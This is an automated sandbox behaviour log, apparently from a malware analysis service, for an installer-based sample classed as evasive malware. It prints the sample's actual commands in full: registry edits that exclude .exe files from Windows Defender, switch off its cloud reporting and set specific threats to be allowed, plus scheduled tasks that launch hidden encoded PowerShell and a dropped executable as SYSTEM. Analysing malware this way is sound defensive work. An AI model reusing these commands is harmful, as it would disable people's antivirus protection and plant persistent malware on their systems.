Source: C:\Windows\SysWOW64\forfiles.exeProcess created: C:\Windows\SysWOW64\cmd.exe /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
Source: C:\Users\user\AppData\Local\Temp\7zS3C09.tmp\Install.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /CREATE /TN "gAhELFxgt" /SC once /ST 12:43:49 /F /RU "user" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\7zS3C09.tmp\Install.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /run /I /tn "gAhELFxgt"
Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\7zS3C09.tmp\Install.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /DELETE /F /TN "gAhELFxgt"
Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\7zS3C09.tmp\Install.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /CREATE /TN "bbsSMGQQDZvgelOgpL" /SC once /ST 19:05:00 /RU "SYSTEM" /TR "\"C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pJKKXsE.exe\" DC /site_id 525403 /S" /V1 /F
Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pJKKXsE.exe C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pJKKXsE.exe DC /site_id 525403 /S
Source: C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pJKKXsE.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\gpupdate.exe "C:\Windows\system32\gpupdate.exe" /force
Source: C:\Windows\System32\gpupdate.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\gpscript.exe gpscript.exe /RefreshSystemParam
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\7zS332F.tmp\Install.exe .\Install.exeJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS332F.tmp\Install.exeProcess created: C:\Users\user\AppData\Local\Temp\7zS3C09.tmp\Install.exe .\Install.exe /S /site_id "525403"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS3C09.tmp\Install.exeProcess created: C:\Windows\SysWOW64\forfiles.exe C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS3C09.tmp\Install.exeProcess created: C:\Windows\SysWOW64\forfiles.exe C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS3C09.tmp\Install.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /CREATE /TN "gAhELFxgt" /SC once /ST 12:43:49 /F /RU "user" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS3C09.tmp\Install.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /run /I /tn "gAhELFxgt"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS3C09.tmp\Install.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /DELETE /F /TN "gAhELFxgt"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS3C09.tmp\Install.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /CREATE /TN "bbsSMGQQDZvgelOgpL" /SC once /ST 19:05:00 /RU "SYSTEM" /TR "\"C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pJKKXsE.exe\" DC /site_id 525403 /S" /V1 /FJump to behavior
Source: C:\Windows\SysWOW64\forfiles.exeProcess created: C:\Windows\SysWOW64\cmd.exe /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&Jump to behavior
Source: C:\Windows\SysWOW64\forfiles.exeProcess created: C:\Windows\SysWOW64\cmd.exe /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\gpupdate.exe "C:\Windows\system32\gpupdate.exe" /force Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pJKKXsE.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pJKKXsE.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pJKKXsE.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pJKKXsE.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pJKKXsE.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pJKKXsE.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pJKKXsE.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
Source: C:\Users\user\AppData\Local\Temp\7zS3C09.tmp\Install.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\7zS332F.tmpJump to behavior
Source: classification engineClassification label: mal88.evad.winEXE@90/15@0/0
Source: C:\Users\user\AppData\Local\Temp\7zS3C09.tmp\Install.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pJKKXsE.exeMutant created: \BaseNamedObjects\Global\1_H69925949
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6324:120:WilError_01
